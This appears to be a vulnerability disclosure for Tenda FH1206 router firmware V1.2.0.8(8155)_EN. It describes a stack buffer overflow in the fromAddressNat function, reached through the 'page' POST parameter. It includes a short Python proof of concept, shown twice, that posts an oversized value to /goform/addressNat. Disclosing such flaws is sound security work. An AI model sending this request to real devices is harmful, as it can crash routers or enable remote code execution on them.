Overview

Tenda FH1206 V1.2.0.8(8155)_EN

Affected version

V1.2.0.8(8155)_EN

Vulnerability details

The Tenda FH1206 V1.2.0.8(8155)_EN has a stack overflow vulnerability located in the fromAddressNat function.The v3 variable receives the page parameter from a POST request and is later assigned to the v5 variable. However, since the user has control over the input of page, the statement sprintf(v5, "addressNatList.asp?page=%s", v3); leads to a buffer overflow. There is no size check, so the user-provided page can exceed the allocated size of the v5 array (256 bytes), thus triggering this security vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

Untitled

PoC

# fromAddressNat_page

import requests

IP = '192.168.0.100:80'

url = f"http://{IP}/goform/addressNat"

data = {"page":"a"*999}

ret = requests.post(url, data)

Untitled

Additional Information

###Product_version
Tenda FH1206 
V1.2.0.8(8155)_EN

###Affected_component
the "fromAddressNat" function of /bin/httpd; /bin/httpd

###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
IP = '192.168.0.100:80'
url = f"http://{IP}/goform/addressNat"
data = {"page":"a"*999}
ret = requests.post(url,data=data)

###Discription
Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the page parameter at ip/goform/addressNat.

###Refernce
<https://palm-vertebra-fe9.notion.site/fromAddressNat_page-e9c05fb00f89482fa340d21bbda30642>
<https://www.tendacn.com/hk/download/detail-2344.html>